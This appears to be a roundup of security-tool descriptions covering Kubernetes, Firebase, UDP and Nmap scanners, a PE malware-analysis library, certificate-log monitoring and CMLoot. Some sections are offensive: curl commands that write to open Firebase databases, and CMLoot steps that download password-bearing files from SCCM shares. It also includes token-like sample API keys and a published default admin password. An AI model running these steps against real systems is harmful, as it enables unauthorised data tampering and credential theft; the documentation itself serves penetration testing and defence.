    1. A Kubernetes cluster is ready, and kubeconfig ( ~/.kube/config) is properly configured for the target cluster.

    Required permissions
    1. Read secrets in cluster scope. This is required for getting image pull secrets for scanning private image repositories.
    2. List pods in cluster scope. This is required for calculating the target pods that need to be scanned.
    3. Create jobs in cluster scope. This is required for creating the jobs that will scan the target pods in their namespaces.

    Configurations
    The file deploy/kubei.yaml is used to deploy and configure Kubei on your cluster.
    1. Set the scan scope. Set the IGNORE_NAMESPACES env variable to ignore specific namespaces. Set TARGET_NAMESPACE to scan a specific namespace, or leave empty to scan all namespaces.
    2. Set the scan speed. Expedite scanning by running parallel scanners. Set the MAX_PARALLELISM env variable for the maximum number of simultaneous scanners.
3. Set the severity level threshold. Vulnerabilities with a severity level at or above SEVERITY_THRESHOLD will be reported. Supported levels are Unknown, Negligible, Low, Medium, High, Critical, Defcon1. Default is Medium.
    4. Set the delete job policy. Set the DELETE_JOB_POLICY env variable to define whether or not to delete completed scanner jobs. Supported values are:
      • All - All jobs will be deleted.
      • Successful - Only successful jobs will be deleted (default).
      • Never - Jobs will never be deleted.
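As a sketch, the same settings can be applied without editing the YAML by hand, assuming Kubei runs as a Deployment named kubei in the kubei namespace (values are illustrative):

# Override scan configuration via environment variables
kubectl -n kubei set env deployment/kubei \
  TARGET_NAMESPACE="" \
  MAX_PARALLELISM=10 \
  SEVERITY_THRESHOLD=Medium \
  DELETE_JOB_POLICY=Successful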

    Usage
    1. Run the following command to deploy Kubei on the cluster:
      kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
    2. Run the following command to verify that Kubei is up and running:
      kubectl -n kubei get pod -lapp=kubei
    3. Then, port forwarding into the Kubei webapp via the following command:
      kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
    4. In your browser, navigate to http://localhost:8080/view/ , and then click 'GO' to run a scan.
    5. To check the state of Kubei, and the progress of ongoing scans, run the following command:
      kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
    6. Refresh the page (http://localhost:8080/view/) to update the results.


    Running Kubei with an external HTTP/HTTPS proxy
    Uncomment and configure the proxy env variables for the Clair and Kubei deployments in deploy/kubei.yaml.

    Limitations
    1. Supports Kubernetes Image Manifest V 2, Schema 2 (https://docs.docker.com/registry/spec/manifest-v2-2/). It will fail to scan on earlier versions.
    2. The CVE database will update once a day.


    FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


FirebaseExploiter is a vulnerability discovery tool that finds Firebase databases which are open and exploitable. It is primarily built for mass hunting bug bounties and for penetration testing.

    Features

    • Mass vulnerability scanning from list of hosts
    • Custom JSON data in exploit.json to upload during exploit
    • Custom URI path for exploit

    Usage

    This will display help for the CLI tool. Here are all the required arguments it supports.

    Installation

FirebaseExploiter was built using go1.19. Make sure you use the latest version of Go to install successfully. Run the following command to install the latest version:

    go install -v github.com/securebinary/firebaseExploiter@latest

    Running FirebaseExploiter

    To scan a specific domain to check for Insecure Firebase DB.

    To exploit a Firebase DB to write your own JSON document in it.

    Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

    Checking the exploited URL to verify the vulnerability.

    Adding custom path for exploiting Firebase DBs.

    Mass scanning for Insecure Firebase Databases from list of target hosts.

    Exploiting vulnerable Firebase DBs from the list of target hosts.
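Independent of the tool, an exposed Firebase Realtime Database can be verified manually; a minimal sketch with curl, assuming the database URL is known (the project ID is a placeholder):

# If the security rules are open, this returns the database contents as JSON
curl "https://<project-id>.firebaseio.com/.json"

# An open database also accepts writes at any path
curl -X PUT -d '{"poc":"writable"}' "https://<project-id>.firebaseio.com/poc.json"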

    License

FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contributions are welcome.


    PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


    PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

    Features

    • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
    • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
    • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
    • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
    • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
    • Calculate Shannon Entropy and Chi Squared for files and sections
    • Calculate ImpHash and Rich and RichPV hash values for files and sections
    • Parse RichHeader and verify checksum
    • Calculate and verify Optional Header checksum
    • Scan for PEiD signatures, internal file type signatures or your own signature database
    • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
    • Extract Unicode and ASCII strings contained in the file
    • Extraction and conversion of .ICO files from icons in the resource section
    • Extraction of version information and manifest from the file
    • Reading .NET metadata and streams (Alpha)

    For more information have a look at PortEx Wiki and the Documentation

    PortexAnalyzer CLI and GUI

PortexAnalyzer CLI is a command line tool that runs the PortEx library under the hood. If you are looking for a ready-compiled command line PE scanner to analyse files, download it here: PortexAnalyzer.jar
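A minimal sketch of running the CLI against a sample (file name is illustrative; see the tool's help output for report and output options):

java -jar PortexAnalyzer.jar sample.exe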

    The GUI version is available here: PortexAnalyzerGUI

    Using PortEx

Including PortEx in a Maven Project

You can include PortEx in your project by adding the following Maven dependency:

<dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
</dependency>

    To use a local build, add the library as follows:

<dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    <scope>system</scope>
    <systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>

Including PortEx in an SBT project

Add the dependency as follows in your build.sbt:

    libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

    Building PortEx

    Requirements

PortEx is built with sbt.

    Compile and Build With sbt

    To simply compile the project invoke:

    $ sbt compile

    To create a jar:

    $ sbt package

    To compile a fat jar that can be used as command line tool, type:

    $ sbt assembly

    Create Eclipse Project

You can create an Eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

    addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

    Generate the project files for Eclipse:

    $ sbt eclipse

    Import the project to Eclipse via the Import Wizard.

    Donations

I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs



    KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective



    KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


    Usage

    The GIF below demonstrates usage of the tool:


    Installation

    KubeStalk is written in Python and requires the requests library.

    To install the tool, you can clone the repository to any directory:

    git clone https://github.com/redhuntlabs/kubestalk

    Once cloned, you need to install the requests library using python3 -m pip install requests or:

    python3 -m pip install -r requirements.txt

    Everything is setup and you can use the tool directly.

    Command-line Arguments

    A list of command line arguments supported by the tool can be displayed using the -h flag.

    $ python3 kubestalk.py  -h

    +---------------------+
    | K U B E S T A L K |
    +---------------------+ v0.1

    [!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
    [!] Author: 0xInfection (RHL Research Team)
    [!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

    usage: ./kubestalk.py <url(s)>/<cidr>

    Required Arguments:
    urls List of hosts to scan

    Optional Arguments:
    -o OUTPUT, --output OUTPUT
    Output path to write the CSV file to
    -f SIG_FILE, --sig-dir SIG_FILE
    Signature directory path to load
    -t TIMEOUT, --timeout TIMEOUT
    HTTP timeout value in seconds
    -ua USER_AGENT, --user-agent USER_AGENT
User agent header to set in HTTP requests
    --concurrency CONCURRENCY
    No. of hosts to process simultaneously
    --verify-ssl Verify SSL certificates
    --version Display the version of KubeStalk and exit.

    Basic Usage

To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 compliant, i.e. they must contain a scheme and hostname (and port if required).

    A basic usage is as below:

$ python3 kubestalk.py https://███.██.██.███:10250

    +---------------------+
    | K U B E S T A L K |
    +---------------------+ v0.1

    [!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
    [!] Author: 0xInfection (RHL Research Team)
    [!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

    [+] Loaded 10 signatures to scan.
[*] Processing host: https://███.██.██.██:10250
[!] Found potential issue on https://███.██.██.██:10250: Kubernetes Pod List Exposure
    [*] Writing results to output file.
    [+] Done.

    HTTP Tuning

    HTTP requests can be fine-tuned using the -t (to mention HTTP timeouts), -ua (to specify custom user agents) and the --verify-ssl (to validate SSL certificates while making requests).

    Concurrency

You can control the number of hosts to scan simultaneously using the --concurrency flag. The default value is set to 5.
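Putting these options together, a sketch of a tuned run against a CIDR (target and values are illustrative):

$ python3 kubestalk.py -t 10 --concurrency 10 -o results.csv https://192.168.0.0/24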

    Output

The output is written to a CSV file and can be controlled by the --output flag.

A sample of the CSV output rendered in markdown is as below:

host | path | issue | type | severity
https://█.█.█.█:10250 | /pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration
https://█.█.█.█:443 | /api/v1/pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration
http://█.█.██.█:80 | / | etcd Viewer Dashboard Exposure | add-on | vulnerability/exposure
http://██.██.█.█:80 | / | cAdvisor Metrics Web UI Dashboard Exposure | add-on | vulnerability/exposure

    Version & License

    The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

    To know more about our Attack Surface Management platform, check out NVADR.



    Nuclearpond - A Utility Leveraging Nuclei To Perform Internet Wide Scans For The Cost Of A Cup Of Coffee


Nuclear Pond is used to leverage Nuclei in the cloud with remarkable speed and flexibility, and to perform internet-wide scans for far less than a cup of coffee.

It leverages AWS Lambda as a backend to invoke Nuclei scans in parallel, offers the choice of storing JSON findings in S3 to query with AWS Athena, and is easily one of the cheapest ways you can execute scans in the cloud.


    Features

    • Output results to your terminal, json, or to S3
    • Specify threads and parallel invocations in any desired number of batches
    • Specify any Nuclei arguments just like you would locally
    • Specify a single host or from a file
    • Run the http server to take scans from the API
    • Run the http server to get status of the scans
    • Query findings through Athena for searching S3
    • Specify a custom nuclei and reporting configurations

    Usage

    Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine but run them in parallel and with however many hosts you want to specify. All you need to think of is the nuclei command line flags you wish to pass to it.

    Setup & Installation

    To install Nuclear Pond, you need to configure the backend terraform module. You can do this by running terraform apply or by leveraging terragrunt.

    $ go install github.com/DevSecOpsDocs/nuclearpond@latest

    Environment Variables

    You can either pass in your backend with flags or through environment variables. You can use -f or --function-name to specify your Lambda function and -r or --region to the specified region. Below are environment variables you can use.

    • AWS_LAMBDA_FUNCTION_NAME is the name of your lambda function to execute the scans on
    • AWS_REGION is the region your resources are deployed
    • NUCLEARPOND_API_KEY is the API key for authenticating to the API
    • AWS_DYNAMODB_TABLE is the dynamodb table to store API scan states

    Command line flags

    Below are some of the flags you can specify when running nuclearpond. The primary flags you need are -t or -l for your target(s), -a for the nuclei args, and -o to specify your output. When specifying Nuclei args you must pass them in as base64 encoded strings by performing -a $(echo -ne "-t dns" | base64).
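For clarity, the encoding step can be split out; a sketch reusing the example arguments above (the Lambda function name is a placeholder):

# Base64-encode the Nuclei arguments, then pass them via -a
NUCLEI_ARGS=$(echo -ne "-t dns" | base64)
nuclearpond run -t devsecopsdocs.com -r us-east-1 -f <function-name> -a "$NUCLEI_ARGS" -o cmd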

    Commands

    Below are the subcommands you can execute within nuclearpond.

    • run: Execute nuclei scans
    • service: Basic API to execute nuclei scans

    Run

An example of the run subcommand: nuclearpond run -t devsecopsdocs.com -r us-east-1 -f jwalker-nuclei-runner-function -a $(echo -ne "-t dns" | base64) -o cmd -b 1, in which the target is devsecopsdocs.com, the region is us-east-1, the Lambda function name is jwalker-nuclei-runner-function, the Nuclei arguments are -t dns, the output is cmd, and -b 1 executes one function with a batch of one host.

    $ nuclearpond run -h
    Executes nuclei tasks in parallel by invoking lambda asynchronously

    Usage:
    nuclearpond run [flags]

    Flags:
    -a, --args string nuclei arguments as base64 encoded string
    -b, --batch-size int batch size for number of targets per execution (default 1)
    -f, --function-name string AWS Lambda function name
    -h, --help help for run
    -o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd")
    -r, --region string AWS region to run nuclei
    -s, --silent silent command line output
    -t, --target string individual target to specify
    -l, --targets string list of targets in a file
-c, --threads int number of threads to run lambda functions, default is 1 which will be slow (default 1)

    Custom Templates

The terraform module by default downloads the templates on execution and also adds the templates as a layer. The template-download variables use the terraform github provider to download the release zip, and the folder inside the zip is placed under /opt. Since Nuclei downloads templates at run time this is not strictly necessary, but to improve performance you can specify -t /opt/nuclei-templates-9.3.4/dns to execute templates from the downloaded zip. To use your own templates you must reference a release; when doing so on your own repository you must specify these variables in the terraform module (github_token is not required if your repository is public).

    • github_repository
    • github_owner
    • release_tag
    • github_token

    Retrieving Findings

    If you have specified s3 as the output, your findings will be located in S3. The fastest way to get at them is to do so with Athena. Assuming you setup the terraform-module as your backend, all you need to do is query them directly through athena. You may have to configure query results if you have not done so already.

select *
from nuclei_db.findings_db
limit 10;

Advanced Query

To dig a little deeper into queries, here is a quick example. The select statement drills down into the info column; the "matched-at" column must be in double quotes due to the - character; and the query searches only for high and critical findings generated by Nuclei.

SELECT
  info.name,
  host,
  type,
  info.severity,
  "matched-at",
  info.description,
  template,
  dt
FROM "nuclei_db"."findings_db"
where
  host like '%devsecopsdocs.com'
  and info.severity in ('high','critical')

    Infrastructure

The backend infrastructure lives entirely within the terraform module. I would strongly recommend reading its readme, as it contains some important notes.

    • Lambda function
    • S3 bucket
      • Stores nuclei binary
      • Stores configuration files
      • Stores findings
    • Glue Database and Table
      • Allows you to query the findings in S3
      • Partitioned by the hour
      • Partition projection
    • IAM Role for Lambda Function


UDPX - Fast And Lightweight, UDPX Is A Single-Packet UDP Scanner Written In Go That Supports The Discovery Of Over 45 Services With The Ability To Add Custom Ones


    Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.

• It is fast. It can scan a whole /16 network in ~20 seconds for a single service.
• You don't need to install libpcap or any other dependencies.
• Runs on Linux, macOS, and Windows. Or on your NetHunter, if you built it for ARM.
• Customizable. You can add your own probes and test for even more protocols.
• Stores results in JSONL format.
• Also scans domain names.

    How it works

Scanning UDP ports is very different from scanning TCP: you may or may not get any result back from probing a UDP port, as UDP is a connectionless protocol. UDPX implements a single-packet approach: a protocol-specific packet is sent to the defined service (port) and UDPX waits for a response. The limit is set to 500 ms by default and can be changed with the -w flag. If the service sends a packet back within this time, it is certain that it is indeed listening on that port, and it is reported as open.

A typical technique is to send 0-byte UDP packets to each port on the target machine. If an "ICMP Port Unreachable" message is received, the port is closed. If a UDP response is received to the probe (unusual), the port is open. If there is no response at all, the state is open or filtered, meaning that the port is either open or packet filters are blocking the communication. This method is not implemented in UDPX, as it adds no value here (UDPX tests only for specific protocols).

    Usage

    Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.

    To scan a single IP:

    udpx -t 1.1.1.1

    To scan a CIDR with maximum of 128 connections and timeout of 1000 ms:

    udpx -t 1.2.3.4/24 -c 128 -w 1000

    To scan targets from file with maximum of 128 connections for only specific service:

    udpx -tf targets.txt -c 128 -s ipmi

    Target can be:

    • IP address
    • CIDR
    • Domain

    IPv6 is supported.

If you want to store the results, use the flag -o [filename]. Output is in JSONL format, as can be seen below:

    {"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}

    Options


    __ ______ ____ _ __
    / / / / __ \/ __ \ |/ /
    / / / / / / / /_/ / /
    / /_/ / /_/ / ____/ |
    \____/_____/_/ /_/|_|
    v1.0.2-beta, by @nullt3r

    Usage of ./udpx-linux-amd64:
    -c int
    Maximum number of concurrent connections (default 32)
    -nr
    Do not randomize addresses
    -o string
    Output file to write results
    -s string
    Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
    -sp
    Show received packets (only first 32 bytes)
    -t string
    IP/CIDR to scan
    -tf string
    File containing IPs/CIDRs to scan
    -w int
    Maximum time to wait for a response (socket timeout) in ms (default 500)

    Building

    You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:

    From git:

    git clone https://github.com/nullt3r/udpx
    cd udpx
    go build ./cmd/udpx

    You can find the binary in the current directory.

    Or via go:

    go install -v github.com/nullt3r/udpx/cmd/udpx@latest

    After that, you can find the binary in $HOME/go/bin/udpx. If you want, move binary to /usr/local/bin/ so you can call it directly.

    Supported services

UDPX supports more than 45 services. The most interesting are:

    • ipmi
    • snmp
    • ike
    • tftp
    • openvpn
    • kerberos
    • ldap

    The complete list of supported services:

    • ard
    • bacnet
    • bacnet_rpm
    • chargen
    • citrix
    • coap
• db
    • digi1
    • digi2
    • digi3
    • dns
    • ipmi
    • ldap
    • mdns
    • memcache
    • mssql
    • nat_port_mapping
    • natpmp
    • netbios
    • netis
    • ntp
    • ntp_monlist
    • openvpn
    • pca_nq
    • pca_st
    • pcanywhere
    • portmap
    • qotd
    • rdp
    • ripv
    • sentinel
    • sip
    • snmp1
    • snmp2
    • snmp3
    • ssdp
    • tftp
    • ubiquiti
    • ubiquiti_discovery_v1
    • ubiquiti_discovery_v2
    • upnp
    • valve
    • wdbrpc
    • wsd
    • wsd_malformed
    • xdmcp
    • kerberos
    • ike

    How to add your own probe?

    Please send a feature request with protocol name and port and I will make it happen. Or add it on your own, the file pkg/probes/probes.go contains all available payloads. Specify the protocol name, port and packet data (hex-encoded).

{
    Name: "ike",
    Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
    Port: []int{500, 4500},
},

    Credits

    Disclaimer

    I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.

    License

    UDPX is distributed under MIT License.



    Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works • Installation • Usage • MODES • For Developers • Credits

    Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

    SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

    In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

    SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

    [Thanks ChatGPT for the Description]


    How it Works ?

    This tool mainly performs 3 tasks

    1. Effective Subdomain Enumeration from Various Tools
    2. Get URLs with open HTTP and HTTPS service.
3. Run Nuclei and other scans on the previous output. So basically, this is an automation script for your initial recon in bug bounty.

    Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirements:

    git clone https://github.com/thecyberneh/scriptkiddi3.git
    cd scriptkiddi3
    bash installer.sh

    Usage

    scriptkiddi3 -h

    This will display help for the tool. Here are all the switches it supports.

    [ABOUT:]
    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
    A recon and initial vulnerability detection tool built using shell script and open source tools.


    [Usage:]
    scriptkiddi3 [MODE] [FLAGS]
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    [MODES:]
    ['-m'/'--mode']
    Available Options for MODE:
    SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    URL | url Run scriptkiddi3 in URL ENUMERATION mode
    EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Features of EXPLOIT mode: subdomain enumeration, URL enumeration,
Vulnerability Detection with Nuclei,
and Scan for SUBDOMAIN TAKEOVER

    [FLAGS:]
    [TARGET:] -d, --domain target domain to scan

    [CONFIG:] -c, --config path of your configuration file for subfinder

    [HELP:] -h, --help to get help menu

    [UPDATE:] -u, --update to update tool

    [Examples:]
    Run scriptkiddi3 in full Exploitation mode
    scriptkiddi3 -m EXP -d target.com


    Use your own CONFIG file for subfinder
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com


    Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m URL -d target.com

    MODES

    1. FULL EXPLOITATION MODE

    Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

      scriptkiddi3 -m EXP -d target.com

    FULL EXPLOITATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • Effective URL Enumeration ( HTTP and HTTPs service )
    • Run Vulnerability Detection with Nuclei
    • Subdomain Takeover Test on previous results

    2. SUBDOMAIN ENUMERATION MODE

    Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

      scriptkiddi3 -m SUB -d target.com

    SUBDOMAIN ENUMERATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
• You can use this mode if you only want to gather subdomains from this tool; in other words, automation of subdomain enumeration using different tools

    3. URL ENUMERATION MODE

    Run scriptkiddi3 in URL ENUMERATION MODE

      scriptkiddi3 -m URL -d target.com

    URL ENUMERATION MODE contains following functions

• Same features as SUBDOMAIN ENUMERATION MODE, but also identifies hosts running an HTTP or HTTPS service

    Using your own CONFIG File for subfinder

      scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.

Updating the tool to the latest version: run the following command

      scriptkiddi3 -u

    An Example of config.yaml

binaryedge:
  - 0bf8919b-aab9-42e4-9574-d3b639324597
  - ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
  - ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
  - sample-email@user.com:sample_password
securitytrails: []
shodan:
  - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
  - ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
  - ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
  - zoomeye_username:zoomeye_password

    For Developers

    If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter (thecyberneh).

    Credits

    I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



    Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


    Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

This is an implementation for our college PCL project, which is still under development and constantly updated.


    API Reference

    Get all items

      GET /api/p1/{username}:{password}/{target}
    GET /api/p2/{username}:{password}/{target}
    GET /api/p3/{username}:{password}/{target}
    GET /api/p4/{username}:{password}/{target}
    GET /api/p5/{username}:{password}/{target}
Parameter | Type | Description
username | string | Required. Username of the current user
password | string | Required. Current user's password
target | string | Required. The target hostname or IP
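A sketch of calling the API with curl, following the route pattern above (host, port, and credentials are placeholders):

# Run an "Effective Scan" (profile p1) against scanme.nmap.org
curl "http://<host>:<port>/api/p1/<username>:<password>/scanme.nmap.org"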

    Get item

      GET /api/p1/
    GET /api/p2/
    GET /api/p3/
    GET /api/p4/
    GET /api/p5/
Parameter | Return data | Description | Nmap Command
p1 | json | Effective Scan | -Pn -sV -T4 -O -F
p2 | json | Simple Scan | -Pn -T4 -A -v
p3 | json | Low Power Scan | -Pn -sS -sU -T4 -A -v
p4 | json | Partial Intense Scan | -Pn -p- -T4 -A -v
p5 | json | Complete Intense Scan | -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

    Auth and User management

      POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
    POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
    POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
    POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
    POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
• Make sure you use the admin credentials mentioned below.
Parameter | Type | Description
admin-username | String | Admin username
admin-passwd | String | Admin password
id | String | ID for the newly added user
username | String | Username of the newly added user
passwd | String | Password of the newly added user
t-username | String | Target username
t-user-id | String | Target user ID
t-userpass | String | Target user's password
new-t-username | String | New username for the target
new-t-user-id | String | New user ID for the target
new-t-userpass | String | New password for the target

    DEFAULT CREDENTIALS

    ADMINISTRATOR : zAp6_oO~t428)@,



    Certwatcher - Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


    CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.


Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing pages, exposed tokens, and secret API key patterns using regular expressions defined in YAML templates.

    Get Started

    Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

    Useful Links

    Contribution

    If you want to contribute to this project, follow the steps below:

    • Fork this repository.
    • Create a new branch with your feature: git checkout -b my-new-feature
    • Make changes and commit the changes: git commit -m 'Adding a new feature'
    • Push to the original branch: git push origin my-new-feature
    • Open a pull request.

    Authors



    CMLoot - Find Interesting Files Stored On (System Center) Configuration Manager (SCCM/CM) SMB Shares


CMLoot was created to easily find interesting files stored on System Center Configuration Manager (SCCM/CM) SMB shares. The shares are used for distributing software to Windows clients in Windows enterprise environments and can contain scripts/configuration files with passwords, certificates (pfx), etc. Most SCCM deployments are configured to allow all users to read the files on the shares; sometimes access is limited to computer accounts.

The Content Library of SCCM/CM has a "complex" (annoying) file structure which CMLoot will untangle for you: https://techcommunity.microsoft.com/t5/configuration-manager-archive/understanding-the-configuration-manager-content-library/ba-p/273349

Essentially, the DataLib folder contains .INI files named after the original filename plus .INI. Each .INI file contains a hash of the file, and the file itself is stored in the FileLib under <folder named after the first 4 chars of the hash>\<full hash>.


    CM Access Accounts

It is possible to apply access control to packages in CM. This, however, only protects the folder holding the file descriptors (DataLib), not the actual files themselves. During inventory, CMLoot records any package it can't access (Access denied) in the file _noaccess.txt. Invoke-CMLootHunt can then use this file to enumerate the actual files that the access control is trying to protect.

    OPSEC

    Windows Defender for Endpoint (EDR) or other security mechanisms might trigger because the script parses a lot of files over SMB.

    HOWTO

Find CM servers by searching for them in Active Directory or by fetching this registry key on a workstation with System Center installed:

    (Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\SMS\DP -Name ManagementPoints).ManagementPoints

    There may be multiple CM servers deployed and they can contain different files so be sure to find all of them.

Then you need to create an inventory file, which is just a text file containing references to file descriptors (.INI). The following command will parse all .INI files on the SCCM server to create a list of available files.

    PS> Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt

    Then use the inventory file created above to download files of interest:

Select files using GridView (mileage may vary with large inventory files):

    PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -GridSelect

Download a single file by copying a line from the inventory text:

    PS> Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml

    Download all files with a certain file extension:

    PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension ps1

Files will by default download to CMLootOut in the folder from which you execute the script; this can be changed with the -OutFolder parameter. Files are saved in the format <file extension>\<first 4 chars of hash>_<original filename>.

    Hunt for files that CMLootInventory found inaccessible:

    Invoke-CMLootHunt -SCCMHost sccm -NoAccessFile sccmfiles_noaccess.txt

    Bulk extract MSI files:

    Invoke-CMLootExtract -Path .\CMLootOut\msi

    DEMO

    Run inventory, scanning available files:

    Select files using GridSelect:

    Download all extensions:

    Hunt "inaccessible" files and MSI extract:

    Author

    Tomas Rzepka / WithSecure



    Noseyparker - A Command-Line Program That Finds Secrets And Sensitive Information In Textual Data And Git History


